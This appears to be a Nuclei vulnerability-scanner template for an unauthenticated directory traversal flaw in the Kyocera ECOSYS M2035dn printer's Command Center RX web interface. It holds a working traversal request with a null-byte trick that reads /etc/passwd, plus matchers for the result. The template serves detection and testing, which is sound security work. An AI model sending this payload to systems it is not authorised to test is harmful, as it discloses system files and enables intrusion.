27 lines
749 B
YAML
27 lines
749 B
YAML
id: kyocera-m2035dn-lfi
|
|
|
|
info:
|
|
name: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50738
|
|
- https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
|
|
tags: printer,iot,kyocera,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|